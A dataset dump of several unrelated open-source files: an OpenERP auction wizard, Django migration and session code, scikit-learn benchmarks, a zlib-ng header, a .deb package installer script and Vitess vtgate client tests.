self.handle_request() | unknown | codeparrot/codeparrot-clean | ||
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from osv import osv
from osv import fields
class auction_lots_cancel(osv.osv):
'''
OpenERP Model
'''
_name = 'auction.lots.cancel'
_description = 'To cancel auction lots.'
def cancel(self, cr, uid, ids, context=None):
"""
To cancel the auction lot
@param self: The object pointer.
@param cr: A database cursor
@param uid: ID of the user currently logged in
@param ids: List of IDs selected
@param context: A standard dictionary
@return:
"""
if context is None:
context={}
lots_obj = self.pool.get('auction.lots')
invoice_obj = self.pool.get('account.invoice')
lot = lots_obj.browse(cr, uid, context.get('active_id', False), context=context)
if lot.ach_inv_id:
supplier_refund_inv_id = invoice_obj.refund(cr, uid, [lot.ach_inv_id.id])
if lot.sel_inv_id:
customer_refund_inv_id = invoice_obj.refund(cr, uid, [lot.sel_inv_id.id])
return {'type': 'ir.actions.act_window_close'}
_columns = {
}
auction_lots_cancel()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4: | unknown | codeparrot/codeparrot-clean | ||
import sys
import os
import operator
from optparse import make_option
from django.apps import apps
from django.core.management.base import BaseCommand, CommandError
from django.db.migrations import Migration
from django.db.migrations.loader import MigrationLoader
from django.db.migrations.autodetector import MigrationAutodetector
from django.db.migrations.questioner import MigrationQuestioner, InteractiveMigrationQuestioner
from django.db.migrations.state import ProjectState
from django.db.migrations.writer import MigrationWriter
from django.utils.six import iteritems
from django.utils.six.moves import reduce
class Command(BaseCommand):
option_list = BaseCommand.option_list + (
make_option('--dry-run', action='store_true', dest='dry_run', default=False,
help="Just show what migrations would be made; don't actually write them."),
make_option('--merge', action='store_true', dest='merge', default=False,
help="Enable fixing of migration conflicts."),
make_option('--empty', action='store_true', dest='empty', default=False,
help="Create an empty migration."),
make_option('--noinput', action='store_false', dest='interactive', default=True,
help='Tells Django to NOT prompt the user for input of any kind.'),
)
help = "Creates new migration(s) for apps."
usage_str = "Usage: ./manage.py makemigrations [--dry-run] [app [app ...]]"
args = "[app_label [app_label ...]]"
def handle(self, *app_labels, **options):
self.verbosity = int(options.get('verbosity'))
self.interactive = options.get('interactive')
self.dry_run = options.get('dry_run', False)
self.merge = options.get('merge', False)
self.empty = options.get('empty', False)
# Make sure the app they asked for exists
app_labels = set(app_labels)
bad_app_labels = set()
for app_label in app_labels:
try:
apps.get_app_config(app_label)
except LookupError:
bad_app_labels.add(app_label)
if bad_app_labels:
for app_label in bad_app_labels:
self.stderr.write("App '%s' could not be found. Is it in INSTALLED_APPS?" % app_label)
sys.exit(2)
# Load the current graph state. Pass in None for the connection so
# the loader doesn't try to resolve replaced migrations from DB.
loader = MigrationLoader(None, ignore_no_migrations=True)
# Before anything else, see if there's conflicting apps and drop out
# hard if there are any and they don't want to merge
conflicts = loader.detect_conflicts()
# If app_labels is specified, filter out conflicting migrations for unspecified apps
if app_labels:
conflicts = dict(
(app_label, conflict) for app_label, conflict in iteritems(conflicts)
if app_label in app_labels
)
if conflicts and not self.merge:
name_str = "; ".join(
"%s in %s" % (", ".join(names), app)
for app, names in conflicts.items()
)
raise CommandError("Conflicting migrations detected (%s).\nTo fix them run 'python manage.py makemigrations --merge'" % name_str)
# If they want to merge and there's nothing to merge, then politely exit
if self.merge and not conflicts:
self.stdout.write("No conflicts detected to merge.")
return
# If they want to merge and there is something to merge, then
# divert into the merge code
if self.merge and conflicts:
return self.handle_merge(loader, conflicts)
# Set up autodetector
autodetector = MigrationAutodetector(
loader.project_state(),
ProjectState.from_apps(apps),
InteractiveMigrationQuestioner(specified_apps=app_labels, dry_run=self.dry_run),
)
# If they want to make an empty migration, make one for each app
if self.empty:
if not app_labels:
raise CommandError("You must supply at least one app label when using --empty.")
# Make a fake changes() result we can pass to arrange_for_graph
changes = dict(
(app, [Migration("custom", app)])
for app in app_labels
)
changes = autodetector.arrange_for_graph(changes, loader.graph)
self.write_migration_files(changes)
return
# Detect changes
changes = autodetector.changes(
graph=loader.graph,
trim_to_apps=app_labels or None,
convert_apps=app_labels or None,
)
# No changes? Tell them.
if not changes and self.verbosity >= 1:
if len(app_labels) == 1:
self.stdout.write("No changes detected in app '%s'" % app_labels.pop())
elif len(app_labels) > 1:
self.stdout.write("No changes detected in apps '%s'" % ("', '".join(app_labels)))
else:
self.stdout.write("No changes detected")
return
self.write_migration_files(changes)
def write_migration_files(self, changes):
"""
Takes a changes dict and writes them out as migration files.
"""
directory_created = {}
for app_label, app_migrations in changes.items():
if self.verbosity >= 1:
self.stdout.write(self.style.MIGRATE_HEADING("Migrations for '%s':" % app_label) + "\n")
for migration in app_migrations:
# Describe the migration
writer = MigrationWriter(migration)
if self.verbosity >= 1:
self.stdout.write(" %s:\n" % (self.style.MIGRATE_LABEL(writer.filename),))
for operation in migration.operations:
self.stdout.write(" - %s\n" % operation.describe())
if not self.dry_run:
# Write the migrations file to the disk.
migrations_directory = os.path.dirname(writer.path)
if not directory_created.get(app_label, False):
if not os.path.isdir(migrations_directory):
os.mkdir(migrations_directory)
init_path = os.path.join(migrations_directory, "__init__.py")
if not os.path.isfile(init_path):
open(init_path, "w").close()
# We just do this once per app
directory_created[app_label] = True
migration_string = writer.as_string()
with open(writer.path, "wb") as fh:
fh.write(migration_string)
elif self.verbosity == 3:
# Alternatively, makemigrations --dry-run --verbosity 3
# will output the migrations to stdout rather than saving
# the file to the disk.
self.stdout.write(self.style.MIGRATE_HEADING("Full migrations file '%s':" % writer.filename) + "\n")
self.stdout.write("%s\n" % writer.as_string())
def handle_merge(self, loader, conflicts):
"""
Handles merging together conflicted migrations interactively,
if it's safe; otherwise, advises on how to fix it.
"""
if self.interactive:
questioner = InteractiveMigrationQuestioner()
else:
questioner = MigrationQuestioner(defaults={'ask_merge': True})
for app_label, migration_names in conflicts.items():
# Grab out the migrations in question, and work out their
# common ancestor.
merge_migrations = []
for migration_name in migration_names:
migration = loader.get_migration(app_label, migration_name)
migration.ancestry = loader.graph.forwards_plan((app_label, migration_name))
merge_migrations.append(migration)
common_ancestor = None
for level in zip(*[m.ancestry for m in merge_migrations]):
if reduce(operator.eq, level):
common_ancestor = level[0]
else:
break
if common_ancestor is None:
raise ValueError("Could not find common ancestor of %s" % migration_names)
# Now work out the operations along each divergent branch
for migration in merge_migrations:
migration.branch = migration.ancestry[
(migration.ancestry.index(common_ancestor) + 1):
]
migration.merged_operations = []
for node_app, node_name in migration.branch:
migration.merged_operations.extend(
loader.get_migration(node_app, node_name).operations
)
# In future, this could use some of the Optimizer code
# (can_optimize_through) to automatically see if they're
# mergeable. For now, we always just prompt the user.
if self.verbosity > 0:
self.stdout.write(self.style.MIGRATE_HEADING("Merging %s" % app_label))
for migration in merge_migrations:
self.stdout.write(self.style.MIGRATE_LABEL(" Branch %s" % migration.name))
for operation in migration.merged_operations:
self.stdout.write(" - %s\n" % operation.describe())
if questioner.ask_merge(app_label):
# If they still want to merge it, then write out an empty
# file depending on the migrations needing merging.
numbers = [
MigrationAutodetector.parse_number(migration.name)
for migration in merge_migrations
]
try:
biggest_number = max([x for x in numbers if x is not None])
except ValueError:
biggest_number = 1
subclass = type("Migration", (Migration, ), {
"dependencies": [(app_label, migration.name) for migration in merge_migrations],
})
new_migration = subclass("%04i_merge" % (biggest_number + 1), app_label)
writer = MigrationWriter(new_migration)
with open(writer.path, "wb") as fh:
fh.write(writer.as_string())
if self.verbosity > 0:
self.stdout.write("\nCreated new merge migration %s" % writer.path) | unknown | codeparrot/codeparrot-clean | ||
from collections import defaultdict
from time import time
import numpy as np
from numpy import random as nr
from sklearn.cluster import KMeans, MiniBatchKMeans
def compute_bench(samples_range, features_range):
it = 0
results = defaultdict(lambda: [])
chunk = 100
max_it = len(samples_range) * len(features_range)
for n_samples in samples_range:
for n_features in features_range:
it += 1
print("==============================")
print("Iteration %03d of %03d" % (it, max_it))
print("==============================")
print()
data = nr.randint(-50, 51, (n_samples, n_features))
print("K-Means")
tstart = time()
kmeans = KMeans(init="k-means++", n_clusters=10).fit(data)
delta = time() - tstart
print("Speed: %0.3fs" % delta)
print("Inertia: %0.5f" % kmeans.inertia_)
print()
results["kmeans_speed"].append(delta)
results["kmeans_quality"].append(kmeans.inertia_)
print("Fast K-Means")
# let's prepare the data in small chunks
mbkmeans = MiniBatchKMeans(
init="k-means++", n_clusters=10, batch_size=chunk
)
tstart = time()
mbkmeans.fit(data)
delta = time() - tstart
print("Speed: %0.3fs" % delta)
print("Inertia: %f" % mbkmeans.inertia_)
print()
print()
results["MiniBatchKMeans Speed"].append(delta)
results["MiniBatchKMeans Quality"].append(mbkmeans.inertia_)
return results
def compute_bench_2(chunks):
results = defaultdict(lambda: [])
n_features = 50000
means = np.array(
[
[1, 1],
[-1, -1],
[1, -1],
[-1, 1],
[0.5, 0.5],
[0.75, -0.5],
[-1, 0.75],
[1, 0],
]
)
X = np.empty((0, 2))
for i in range(8):
X = np.r_[X, means[i] + 0.8 * np.random.randn(n_features, 2)]
max_it = len(chunks)
it = 0
for chunk in chunks:
it += 1
print("==============================")
print("Iteration %03d of %03d" % (it, max_it))
print("==============================")
print()
print("Fast K-Means")
tstart = time()
mbkmeans = MiniBatchKMeans(init="k-means++", n_clusters=8, batch_size=chunk)
mbkmeans.fit(X)
delta = time() - tstart
print("Speed: %0.3fs" % delta)
print("Inertia: %0.3fs" % mbkmeans.inertia_)
print()
results["MiniBatchKMeans Speed"].append(delta)
results["MiniBatchKMeans Quality"].append(mbkmeans.inertia_)
return results
if __name__ == "__main__":
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import axes3d # register the 3d projection # noqa: F401
samples_range = np.linspace(50, 150, 5).astype(int)
features_range = np.linspace(150, 50000, 5).astype(int)
chunks = np.linspace(500, 10000, 15).astype(int)
results = compute_bench(samples_range, features_range)
results_2 = compute_bench_2(chunks)
max_time = max(
[max(i) for i in [t for (label, t) in results.items() if "speed" in label]]
)
max_inertia = max(
[max(i) for i in [t for (label, t) in results.items() if "speed" not in label]]
)
fig = plt.figure("scikit-learn K-Means benchmark results")
for c, (label, timings) in zip("brcy", sorted(results.items())):
if "speed" in label:
ax = fig.add_subplot(2, 2, 1, projection="3d")
ax.set_zlim3d(0.0, max_time * 1.1)
else:
ax = fig.add_subplot(2, 2, 2, projection="3d")
ax.set_zlim3d(0.0, max_inertia * 1.1)
X, Y = np.meshgrid(samples_range, features_range)
Z = np.asarray(timings).reshape(samples_range.shape[0], features_range.shape[0])
ax.plot_surface(X, Y, Z.T, cstride=1, rstride=1, color=c, alpha=0.5)
ax.set_xlabel("n_samples")
ax.set_ylabel("n_features")
i = 0
for c, (label, timings) in zip("br", sorted(results_2.items())):
i += 1
ax = fig.add_subplot(2, 2, i + 2)
y = np.asarray(timings)
ax.plot(chunks, y, color=c, alpha=0.8)
ax.set_xlabel("Chunks")
ax.set_ylabel(label)
plt.show() | python | github | https://github.com/scikit-learn/scikit-learn | benchmarks/bench_plot_fastkmeans.py |
import logging
from django.contrib.sessions.backends.base import (
CreateError, SessionBase, UpdateError,
)
from django.core.exceptions import SuspiciousOperation
from django.db import DatabaseError, IntegrityError, router, transaction
from django.utils import timezone
from django.utils.encoding import force_text
from django.utils.functional import cached_property
class SessionStore(SessionBase):
"""
Implements database session store.
"""
def __init__(self, session_key=None):
super(SessionStore, self).__init__(session_key)
@classmethod
def get_model_class(cls):
# Avoids a circular import and allows importing SessionStore when
# django.contrib.sessions is not in INSTALLED_APPS.
from django.contrib.sessions.models import Session
return Session
@cached_property
def model(self):
return self.get_model_class()
def load(self):
try:
s = self.model.objects.get(
session_key=self.session_key,
expire_date__gt=timezone.now()
)
return self.decode(s.session_data)
except (self.model.DoesNotExist, SuspiciousOperation) as e:
if isinstance(e, SuspiciousOperation):
logger = logging.getLogger('django.security.%s' % e.__class__.__name__)
logger.warning(force_text(e))
self._session_key = None
return {}
def exists(self, session_key):
return self.model.objects.filter(session_key=session_key).exists()
def create(self):
while True:
self._session_key = self._get_new_session_key()
try:
# Save immediately to ensure we have a unique entry in the
# database.
self.save(must_create=True)
except CreateError:
# Key wasn't unique. Try again.
continue
self.modified = True
return
def create_model_instance(self, data):
"""
Return a new instance of the session model object, which represents the
current session state. Intended to be used for saving the session data
to the database.
"""
return self.model(
session_key=self._get_or_create_session_key(),
session_data=self.encode(data),
expire_date=self.get_expiry_date(),
)
def save(self, must_create=False):
"""
Saves the current session data to the database. If 'must_create' is
True, a database error will be raised if the saving operation doesn't
create a *new* entry (as opposed to possibly updating an existing
entry).
"""
if self.session_key is None:
return self.create()
data = self._get_session(no_load=must_create)
obj = self.create_model_instance(data)
using = router.db_for_write(self.model, instance=obj)
try:
with transaction.atomic(using=using):
obj.save(force_insert=must_create, force_update=not must_create, using=using)
except IntegrityError:
if must_create:
raise CreateError
raise
except DatabaseError:
if not must_create:
raise UpdateError
raise
def delete(self, session_key=None):
if session_key is None:
if self.session_key is None:
return
session_key = self.session_key
try:
self.model.objects.get(session_key=session_key).delete()
except self.model.DoesNotExist:
pass
@classmethod
def clear_expired(cls):
cls.get_model_class().objects.filter(expire_date__lt=timezone.now()).delete() | unknown | codeparrot/codeparrot-clean | ||
#ifndef TREES_H_
#define TREES_H_
/* Constants */
#define DIST_CODE_LEN 512
/* see definition of array dist_code in trees.c */
#define MAX_BL_BITS 7
/* Bit length codes must not exceed MAX_BL_BITS bits */
#define REP_3_6 16
/* repeat previous bit length 3-6 times (2 bits of repeat count) */
#define REPZ_3_10 17
/* repeat a zero length 3-10 times (3 bits of repeat count) */
#define REPZ_11_138 18
/* repeat a zero length 11-138 times (7 bits of repeat count) */
static const int extra_lbits[LENGTH_CODES] /* extra bits for each length code */
= {0,0,0,0,0,0,0,0,1,1,1,1,2,2,2,2,3,3,3,3,4,4,4,4,5,5,5,5,0};
static const int extra_dbits[D_CODES] /* extra bits for each distance code */
= {0,0,0,0,1,1,2,2,3,3,4,4,5,5,6,6,7,7,8,8,9,9,10,10,11,11,12,12,13,13};
static const int extra_blbits[BL_CODES] /* extra bits for each bit length code */
= {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,3,7};
static const unsigned char bl_order[BL_CODES]
= {16,17,18,0,8,7,9,6,10,5,11,4,12,3,13,2,14,1,15};
/* The lengths of the bit length codes are sent in order of decreasing
* probability, to avoid transmitting the lengths for unused bit length codes.
*/
/* Function definitions */
void gen_codes (ct_data *tree, int max_code, uint16_t *bl_count);
#endif | c | github | https://github.com/opencv/opencv | 3rdparty/zlib-ng/trees.h |
from sklearn.ensemble import (
GradientBoostingClassifier,
HistGradientBoostingClassifier,
RandomForestClassifier,
)
from .common import Benchmark, Estimator, Predictor
from .datasets import (
_20newsgroups_highdim_dataset,
_20newsgroups_lowdim_dataset,
_synth_classification_dataset,
)
from .utils import make_gen_classif_scorers
class RandomForestClassifierBenchmark(Predictor, Estimator, Benchmark):
    """Benchmarks for RandomForestClassifier."""

    param_names = ["representation", "n_jobs"]
    params = (["dense", "sparse"], Benchmark.n_jobs_vals)

    def setup_cache(self):
        super().setup_cache()

    def make_data(self, params):
        # The sparse variant exercises the high-dimensional 20newsgroups data.
        representation, _ = params
        if representation == "sparse":
            return _20newsgroups_highdim_dataset()
        return _20newsgroups_lowdim_dataset()

    def make_estimator(self, params):
        _, n_jobs = params
        # Grow a bigger forest under the "large" benchmark profile.
        n_estimators = 500 if Benchmark.data_size == "large" else 100
        return RandomForestClassifier(
            n_estimators=n_estimators,
            min_samples_split=10,
            max_features="log2",
            n_jobs=n_jobs,
            random_state=0,
        )

    def make_scorers(self):
        make_gen_classif_scorers(self)
class GradientBoostingClassifierBenchmark(Predictor, Estimator, Benchmark):
    """Benchmarks for GradientBoostingClassifier."""

    param_names = ["representation"]
    params = (["dense", "sparse"],)

    def setup_cache(self):
        super().setup_cache()

    def make_data(self, params):
        (representation,) = params
        # Pick the dataset loader by representation, then materialize it.
        loader = (
            _20newsgroups_highdim_dataset
            if representation == "sparse"
            else _20newsgroups_lowdim_dataset
        )
        return loader()

    def make_estimator(self, params):
        # More boosting rounds under the "large" benchmark profile.
        n_estimators = 100 if Benchmark.data_size == "large" else 10
        return GradientBoostingClassifier(
            n_estimators=n_estimators,
            max_features="log2",
            subsample=0.5,
            random_state=0,
        )

    def make_scorers(self):
        make_gen_classif_scorers(self)
class HistGradientBoostingClassifierBenchmark(Predictor, Estimator, Benchmark):
    """Benchmarks for HistGradientBoostingClassifier."""

    param_names = []
    params = ()

    def setup_cache(self):
        super().setup_cache()

    def make_data(self, params):
        # Synthetic multi-class problem; this estimator has no sparse variant.
        return _synth_classification_dataset(
            n_samples=10000, n_features=100, n_classes=5
        )

    def make_estimator(self, params):
        return HistGradientBoostingClassifier(
            max_iter=100, max_leaf_nodes=15, early_stopping=False, random_state=0
        )

    def make_scorers(self):
        make_gen_classif_scorers(self)
#!/usr/bin/env python
import os
import sys
import subprocess
from optparse import OptionParser
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
PARAMETERS = None
def doCMD(cmd):
    """Run *cmd* through a shell, echoing its output line by line.

    Returns a tuple (return_code, output_lines).  Note: Python 2 syntax.
    """
    print "-->> \"%s\"" % cmd
    output = []
    cmd_return_code = 1
    # stderr is merged into stdout so everything is captured in one stream.
    cmd_proc = subprocess.Popen(
        cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
    while True:
        output_line = cmd_proc.stdout.readline().strip("\r\n")
        cmd_return_code = cmd_proc.poll()
        # Stop once the process has exited and its output is drained.
        if output_line == '' and cmd_return_code is not None:
            break
        sys.stdout.write("%s\n" % output_line)
        sys.stdout.flush()
        output.append(output_line)
    return (cmd_return_code, output)
def uninstPKGs():
    """Purge every package whose .deb file lives under SCRIPT_DIR.

    The package id is derived from the .deb file name (everything before
    the first underscore).  Returns True if all purges succeeded,
    False as soon as one fails.
    """
    for root, dirs, files in os.walk(SCRIPT_DIR):
        for file in files:
            if not file.endswith(".deb"):
                continue
            debName = os.path.basename(os.path.splitext(file)[0])
            pkg_id = debName.split("_")[0]
            # Only purge packages that are actually installed (binary on PATH).
            if doCMD("which %s" % pkg_id)[0] == 0:
                (return_code, output) = doCMD(
                    "sudo dpkg -P %s" % pkg_id)
                if return_code != 0:
                    # Bug fix: the original 'break' only exited the inner
                    # loop, so purging continued in other directories after
                    # a failure.  Abort immediately instead.
                    return False
    return True
def instPKGs():
    """Install every non-upgrade .deb package found under SCRIPT_DIR.

    Returns True if all dpkg invocations succeeded, False as soon as one
    fails.
    """
    for root, dirs, files in os.walk(SCRIPT_DIR):
        for file in files:
            # Skip upgrade packages; they are handled elsewhere.
            if file.endswith(".deb") and file.find("upgrade") == -1:
                cmd = "sudo dpkg -i %s/%s" % (root, file)
                (return_code, output) = doCMD(cmd)
                if return_code != 0:
                    # Bug fix: the original 'break' only exited the inner
                    # loop, so installation continued in other directories
                    # after a failure.  Abort immediately instead.
                    return False
    return True
def initEnv():
    """Install the xwalk launcher script next to the existing xwalk binary.

    Copies xwalk.sh into the directory containing 'xwalk' (defaults to
    /usr/bin when 'which xwalk' fails) and hard-links it as 'xwalk'.
    Returns True on success.
    """
    action_status = True
    xwalk_dir = "/usr/bin"
    cmd = "which xwalk"
    (return_code, xwalk_path) = doCMD(cmd)
    if return_code == 0:
        # First line of 'which' output is the full path to the binary.
        xwalk_dir = os.path.dirname(xwalk_path[0])
    cmdList = ["sudo rm -rf %s/xwalk", "sudo cp -rf xwalk.sh %s/", "sudo ln /usr/bin/xwalk.sh %s/xwalk"]
    for cmdstr in cmdList:
        cmd = cmdstr % xwalk_dir
        (return_code, xwalk_path) = doCMD(cmd)
        if return_code != 0:
            action_status = False
            break
    return action_status
def main():
    """Parse -i/-u command-line options and install or uninstall packages."""
    try:
        usage = "usage: inst.py -i"
        opts_parser = OptionParser(usage=usage)
        opts_parser.add_option(
            "-i", dest="binstpkg", action="store_true", help="Install package")
        opts_parser.add_option(
            "-u", dest="buninstpkg", action="store_true", help="Uninstall package")
        global PARAMETERS
        (PARAMETERS, args) = opts_parser.parse_args()
    except Exception as e:
        print "Got wrong option: %s, exit ..." % e
        sys.exit(1)
    # -i and -u are mutually exclusive.
    if PARAMETERS.binstpkg and PARAMETERS.buninstpkg:
        print "-i and -u are conflict"
        sys.exit(1)
    if PARAMETERS.buninstpkg:
        if not uninstPKGs():
            sys.exit(1)
    else:
        # Environment setup is currently disabled; install is the default.
        #if not initEnv():
            #sys.exit(1)
        if not instPKGs():
            sys.exit(1)
if __name__ == "__main__":
    main()
    sys.exit(0)  # explicit success exit code
#!/usr/bin/env python
#
# Copyright 2015 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can
# be found in the LICENSE file.
"""This test uses vtgateclienttest to test the vtdb python vtgate client.
"""
import logging
import struct
import unittest
import environment
from protocols_flavor import protocols_flavor
import utils
from vtdb import dbexceptions
from vtdb import keyrange
from vtdb import keyrange_constants
from vtdb import vtgate_client
from vtdb import vtgate_cursor
# Handle and reserved ports of the vtgateclienttest helper process;
# populated by setUpModule() below.
vtgateclienttest_process = None
vtgateclienttest_port = None
vtgateclienttest_grpc_port = None
def setUpModule():
  """Start the topo server and a vtgateclienttest process for all tests."""
  global vtgateclienttest_process
  global vtgateclienttest_port
  global vtgateclienttest_grpc_port

  try:
    environment.topo_server().setup()

    vtgateclienttest_port = environment.reserve_ports(1)
    args = environment.binary_args('vtgateclienttest') + [
        '-log_dir', environment.vtlogroot,
        '-port', str(vtgateclienttest_port),
        ]

    # A gRPC port is only needed when the python client speaks gRPC.
    if protocols_flavor().vtgate_python_protocol() == 'grpc':
      vtgateclienttest_grpc_port = environment.reserve_ports(1)
      args.extend(['-grpc_port', str(vtgateclienttest_grpc_port)])
    if protocols_flavor().service_map():
      args.extend(['-service_map', ','.join(protocols_flavor().service_map())])
    vtgateclienttest_process = utils.run_bg(args)
    # Block until the server exports its vars, i.e. is ready to serve.
    utils.wait_for_vars('vtgateclienttest', vtgateclienttest_port)
  except:
    # Tear down any partially-started services before re-raising.
    tearDownModule()
    raise
def tearDownModule():
  """Stop the vtgateclienttest process and the topo server."""
  # NOTE(review): vtgateclienttest_process may still be None if setup failed
  # before the spawn; presumably kill_sub_process tolerates None -- confirm.
  utils.kill_sub_process(vtgateclienttest_process, soft=True)
  if vtgateclienttest_process:
    vtgateclienttest_process.wait()
  environment.topo_server().teardown()
class TestPythonClientBase(unittest.TestCase):
  """Base class for Python client tests."""

  # Seconds allowed for establishing connections.
  CONNECT_TIMEOUT = 10.0

  # A packed keyspace_id from the middle of the full keyrange.
  KEYSPACE_ID_0X80 = struct.Struct('!Q').pack(0x80 << 56)

  def setUp(self):
    """Open a connection to the local vtgateclienttest process."""
    super(TestPythonClientBase, self).setUp()
    addr = 'localhost:%d' % vtgateclienttest_port
    protocol = protocols_flavor().vtgate_python_protocol()
    self.conn = vtgate_client.connect(protocol, addr, 30.0)
    logging.info(
        'Start: %s, protocol %s.',
        '.'.join(self.id().split('.')[-2:]), protocol)

  def tearDown(self):
    self.conn.close()

  def _open_keyspace_ids_cursor(self):
    # Cursor routed by a single keyspace id.
    return self.conn.cursor(
        'keyspace', 'master', keyspace_ids=[self.KEYSPACE_ID_0X80])

  def _open_keyranges_cursor(self):
    # Cursor routed by the full (non-partial) keyrange.
    kr = keyrange.KeyRange(keyrange_constants.NON_PARTIAL_KEYRANGE)
    return self.conn.cursor('keyspace', 'master', keyranges=[kr])

  def _open_batch_cursor(self):
    # Batch cursor: the keyspace is supplied per statement instead.
    return self.conn.cursor(keyspace=None, tablet_type='master')

  def _open_stream_keyranges_cursor(self):
    kr = keyrange.KeyRange(keyrange_constants.NON_PARTIAL_KEYRANGE)
    return self.conn.cursor(
        'keyspace', 'master', keyranges=[kr],
        cursorclass=vtgate_cursor.StreamVTGateCursor)

  def _open_stream_keyspace_ids_cursor(self):
    return self.conn.cursor(
        'keyspace', 'master', keyspace_ids=[self.KEYSPACE_ID_0X80],
        cursorclass=vtgate_cursor.StreamVTGateCursor)
class TestPythonClientErrors(TestPythonClientBase):
  """Test cases to verify that the Python client can handle errors correctly."""

  def test_execute_integrity_errors(self):
    """Test we raise dbexceptions.IntegrityError for Execute calls."""
    # Special query that makes vtgateclienttest return an IntegrityError.
    self._verify_exception_for_execute(
        'error://integrity error',
        dbexceptions.IntegrityError)

  def test_partial_integrity_errors(self):
    """Raise an IntegrityError when Execute returns a partial error."""
    # Special query that makes vtgateclienttest return a partial error.
    self._verify_exception_for_execute(
        'partialerror://integrity error',
        dbexceptions.IntegrityError)

  def _verify_exception_for_execute(self, query, exception):
    """Verify that we raise a specific exception for all Execute calls.

    Exercises every Execute-style vtgate entry point the client exposes.

    Args:
      query: query string to use for execute calls.
      exception: exception class that we expect the execute call to raise.
    """
    # FIXME(alainjobart) add test for Execute once factory supports it
    # FIXME(alainjobart) add test for ExecuteShards once factory supports it

    # ExecuteKeyspaceIds test
    cursor = self._open_keyspace_ids_cursor()
    with self.assertRaises(exception):
      cursor.execute(query, {})
    cursor.close()

    # ExecuteKeyRanges test
    cursor = self._open_keyranges_cursor()
    with self.assertRaises(exception):
      cursor.execute(query, {})
    cursor.close()

    # ExecuteEntityIds test
    cursor = self.conn.cursor('keyspace', 'master')
    with self.assertRaises(exception):
      cursor.execute(
          query, {},
          entity_keyspace_id_map={1: self.KEYSPACE_ID_0X80},
          entity_column_name='user_id')
    cursor.close()

    # ExecuteBatchKeyspaceIds test
    cursor = self._open_batch_cursor()
    with self.assertRaises(exception):
      cursor.executemany(
          sql=None,
          params_list=[
              dict(
                  sql=query,
                  bind_variables={},
                  keyspace='keyspace',
                  keyspace_ids=[self.KEYSPACE_ID_0X80])])
    cursor.close()

    # ExecuteBatchShard test
    cursor = self._open_batch_cursor()
    with self.assertRaises(exception):
      cursor.executemany(
          sql=None,
          params_list=[
              dict(
                  sql=query,
                  bind_variables={},
                  keyspace='keyspace',
                  shards=[keyrange_constants.SHARD_ZERO])])
    cursor.close()

  def _verify_exception_for_stream_execute(self, query, exception):
    """Verify that we raise a specific exception for all StreamExecute calls.

    Args:
      query: query string to use for StreamExecute calls.
      exception: exception class that we expect StreamExecute to raise.
    """
    # StreamExecuteKeyspaceIds test
    cursor = self._open_stream_keyspace_ids_cursor()
    with self.assertRaises(exception):
      cursor.execute(query, {})
    cursor.close()

    # StreamExecuteKeyRanges test
    cursor = self._open_stream_keyranges_cursor()
    with self.assertRaises(exception):
      cursor.execute(query, {})
    cursor.close()

  def test_streaming_integrity_error(self):
    """Test we raise dbexceptions.IntegrityError for StreamExecute calls."""
    # TODO(aaijazi): this test doesn't work for all clients yet.
    if protocols_flavor().vtgate_python_protocol() != 'gorpc':
      return
    self._verify_exception_for_stream_execute(
        'error://integrity error',
        dbexceptions.IntegrityError)

  def test_transient_error(self):
    """Test we raise dbexceptions.TransientError for Execute calls."""
    # TODO(aaijazi): this test doesn't work for all clients yet.
    if protocols_flavor().vtgate_python_protocol() != 'gorpc':
      return
    # Special query that makes vtgateclienttest return a TransientError.
    self._verify_exception_for_execute(
        'error://transient error',
        dbexceptions.TransientError)

  def test_streaming_transient_error(self):
    """Test we raise dbexceptions.IntegrityError for StreamExecute calls."""
    # TODO(aaijazi): this test doesn't work for all clients yet.
    if protocols_flavor().vtgate_python_protocol() != 'gorpc':
      return
    self._verify_exception_for_stream_execute(
        'error://transient error',
        dbexceptions.TransientError)

  def test_error(self):
    """Test a regular server error raises the right exception."""
    error_request = 'error://unknown error'
    error_caller_id = vtgate_client.CallerID(principal=error_request)
    # Begin test
    with self.assertRaisesRegexp(dbexceptions.DatabaseError, 'forced error'):
      self.conn.begin(error_caller_id)
    # Commit test
    # NOTE(review): this and the "Rollback test" below call begin() again
    # rather than commit()/rollback() -- looks like a copy-paste slip.
    # Confirm intended coverage before changing.
    with self.assertRaisesRegexp(dbexceptions.DatabaseError, 'forced error'):
      self.conn.begin(error_caller_id)
    # Rollback test
    with self.assertRaisesRegexp(dbexceptions.DatabaseError, 'forced error'):
      self.conn.begin(error_caller_id)
    # GetSrvKeyspace test
    with self.assertRaisesRegexp(dbexceptions.DatabaseError, 'forced error'):
      self.conn.get_srv_keyspace(error_request)
class TestPythonClient(TestPythonClientBase):
  """Non-error test cases for the Python client."""

  def test_success_get_srv_keyspace(self):
    """Test we get the right results from get_srv_keyspace.

    We only test the successful cases.
    """
    # big has one big shard
    big = self.conn.get_srv_keyspace('big')
    self.assertEquals(big.name, 'big')
    self.assertEquals(big.sharding_col_name, 'sharding_column_name')
    self.assertEquals(big.sharding_col_type, keyrange_constants.KIT_UINT64)
    self.assertEquals(big.served_from, {'master': 'other_keyspace'})
    self.assertEquals(big.get_shards('replica'),
                      [{'Name': 'shard0',
                        'KeyRange': {
                            'Start': '\x40\x00\x00\x00\x00\x00\x00\x00',
                            'End': '\x80\x00\x00\x00\x00\x00\x00\x00',
                            }}])
    self.assertEquals(big.get_shard_count('replica'), 1)
    self.assertEquals(big.get_shard_count('rdonly'), 0)
    self.assertEquals(big.get_shard_names('replica'), ['shard0'])
    # 0x60... falls inside shard0's [0x40..., 0x80...) keyrange.
    self.assertEquals(big.keyspace_id_to_shard_name_for_db_type(
        0x6000000000000000, 'replica'), 'shard0')
